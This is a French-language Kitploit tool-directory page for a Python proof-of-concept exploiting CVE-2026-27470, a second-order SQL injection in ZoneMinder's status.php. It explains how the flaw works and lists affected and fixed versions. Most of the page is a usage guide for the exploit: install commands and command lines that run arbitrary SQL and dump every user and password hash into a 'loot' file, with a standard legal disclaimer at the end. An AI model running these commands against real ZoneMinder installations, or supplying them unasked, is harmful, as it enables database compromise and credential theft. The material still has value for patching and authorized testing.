Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-27470-POC — PoC Python pour CVE-2026-27470, injection SQL de second ordre authentifiée dans getNearEvents() (status.php) de ZoneMinder, CVSS 8.8 | Kitploit
Outils/GitHubGitHub/d3vn0mi/cve-2026-27470-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubd3vn0mi/cve-2026-27470-poc

CVE-2026-27470-POC

PoC Python pour CVE-2026-27470, injection SQL de second ordre authentifiée dans getNearEvents() (status.php) de ZoneMinder, CVSS 8.8

Voir le dépôt
2il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-27470 — Preuve de concept d'injection SQL de second ordre dans ZoneMinder

Auteur : d3vn0mi | CVSS 8.8 | Authentifié | Permission Événements requise

Présentation

CVE-2026-27470 est une vulnérabilité d'injection SQL de second ordre dans web/ajax/status.php de ZoneMinder — plus précisément dans la fonction getNearEvents().

DétailValeur
Version affectéeZoneMinder <= 1.36.37 et 1.37.61 – 1.38.0
Corrigé dans1.36.38 / 1.38.1
TypeInjection SQL de second ordre
Authentification requiseOui (tout utilisateur disposant de la permission Événements)
CVSS8.8 (Élevé)

Fonctionnement

La vulnérabilité est une injection SQL en deux phases (de second ordre) :

  1. Phase 1 — Stockage : L'attaquant renomme un événement (ou modifie son champ Cause) pour y inclure une charge utile SQL. ZoneMinder utilise une requête paramétrée pour cette écriture, donc la charge utile est stockée en toute sécurité dans la base de données — aucun WAF ni filtre ne la bloque.

  2. Phase 2 — Déclenchement : L'attaquant demande l'entité nearevents via l'API de statut. La fonction getNearEvents() lit le nom/cause de l'événement stocké dans la base de données et le concatène directement dans une nouvelle requête SQL sans assainissement, ce qui entraîne une injection SQL.

Étant donné que le vecteur d'injection (données stockées) est distinct du déclencheur (une requête GET propre), cela contourne la plupart des protections au niveau des entrées.

Installation

root@kitploit:~
git clone https://github.com/d3vn0mi/CVE-2026-27470-POC.git
cd CVE-2026-27470-POC
pip install -r requirements.txt

Utilisation

Base — Extraire la version de la base de données

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password

Requête SQL personnalisée

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT user()"

Extraire tous les utilisateurs et les hachages de mots de passe

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users

Les identifiants sont enregistrés dans dumped_creds.txt par défaut.

Enregistrer les résultats dans un fichier personnalisé

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --dump-users -o loot.txt
python3 poc.py -t http://10.10.10.10 -u admin -p password --query "SELECT @@datadir" -o result.txt

Passer par un proxy (Burp / mitmproxy)

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --proxy http://127.0.0.1:8080

Utiliser le champ Cause au lieu du nom

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --field Cause --query "SELECT database()"

Spécifier manuellement un ID d'événement

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password --event-id 42

Sortie verbeuse / débogage

root@kitploit:~
python3 poc.py -t http://10.10.10.10 -u admin -p password -v

Options

OptionDescriptionDéfaut
-t, --targetURL cible(requis)
-u, --usernameNom d'utilisateur ZoneMinder(requis)
-p, --passwordMot de passe ZoneMinder(requis)
--queryRequête SQL à exécuterSELECT VERSION()
--dump-usersExtraire tous les noms d'utilisateur et hachages de mots de passe
-o, --outputEnregistrer les résultats dans un fichierdumped_creds.txt
--event-idID d'événement à utiliser comme vecteur d'injection(détection automatique)
--fieldChamp d'injection : Name ou CauseName
--no-restoreNe pas restaurer le nom de l'événement après l'exploitation
--proxyURL du proxy HTTP
--timeoutDélai d'expiration de la requête en secondes30
-v, --verboseActiver la journalisation de débogage

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de recherche en sécurité autorisée. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation écrite explicite de test. Les auteurs ne sont pas responsables de toute utilisation abusive ou de tout dommage causé par cet outil.

Références

  • Site officiel de ZoneMinder
  • Dépôt GitHub de ZoneMinder
Télécharger l’outil